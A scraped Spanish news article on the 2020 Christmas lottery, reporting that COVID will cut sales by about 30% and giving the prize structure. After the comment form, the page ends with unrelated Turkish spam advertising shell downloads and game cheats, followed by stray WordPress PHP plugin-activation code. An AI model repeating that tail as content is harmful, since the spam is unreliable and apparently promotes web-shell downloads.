La lotería de Navidad 2020 se verá «seriamente afectada por la crisis del coronavirus»



ABCMADRID
Actualizado:22/11/2020 02:19h
Guardar
Noticias relacionadas

La empresa pública Selae factura millones con su negocio de lotería. En 2019 las ventas crecieron un 2,85% con respecto al 2018, y se alcanzó cifra de 9.256,75 millones de euros, con unos beneficios de 2.466 millones de euros. En concreto, la Lotería de Navidad registró una facturación de 2.905 millones, un 3,09% más, en un año récord para las ventas, el mejor ejercicio desde la senda de recuperación tras la crisis económica que se inició en 2014.

Sin embargo, este año 2020 la crisis del coronavirus truncará este evolución positiva de las ventas de lotería general y del Sorteo de Navidad en concreto. Los loteros de las Asociaciones Provinciales de Administradores de Lotería (Anapal) comunicaron el pasado octubre unas cifras de venta «desalentadoras» con un descenso del 30% la compra de décimas en comparación con 2019.

El desplome de la facturación se basa en que colectivos que funcionan como un gancho para este sorteo, tal es el caso de los clubes deportivos, las entidades festivas, las empresas u organizaciones sociales; no tienen apenas actividad este año. Desde Anapal creen que estos escenarios son «muy preocupantes y no registran el volumen de años anteriores, con una caída del 50%».

Con este desplome de las ventas a colectivos y empresas que tradicionalmente compran y reparten participaciones para optar a ganar El Gordo de Navidad, los loteros advierten de que las arcas del Estado dejarán de ingresar 1.200 millones de euros en ventas. «Con estas cifras reales de las ventas durante el período post confinamiento y la previsión de ventas del Sorteo de Navidad, podemos concluir algo que ya avisábamos: nuestra campaña más importante va a verse muy seriamente afectada por la crisis del coronavirus. Y lo que es peor, corre grave riesgo la aportación a las arcas públicas de los beneficios que reportan esos más de 1.200 millones de euros en ventas».

Los loteros proponen «mejoras en el sistema de gestión del Sorteo de Navidad que ayudarían a aumentar sus ventas, como la posibilidad del pago de participaciones de lotería en las administraciones o la gestión de números abonados. Asimismo facilitar el pago de los premios obtenidos en las compras online en las administraciones de lotería sería beneficioso», recalcan.

Casi 2.500 millones en premios

En el Sorteo Extraordinario de Navidad estarán disponibles un total de 172 millones de décimos, con una emisión de 172 series de 100.000 números cada una. El importe que alcanza será de 3.440 millones de euros, de los que se reparte un 70% en premios, es decir, los 2.408 millones mencionados.

Por lo tanto, el «Gordo» de Navidad, primer premio, será de 400.000 euros al décimo. El segundo premio será de 125.000 euros por boleto y el tercero repartirá 50.000. El importe seguirá siendo de 20 euros por décimo.

Ver los
comentariosTemas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );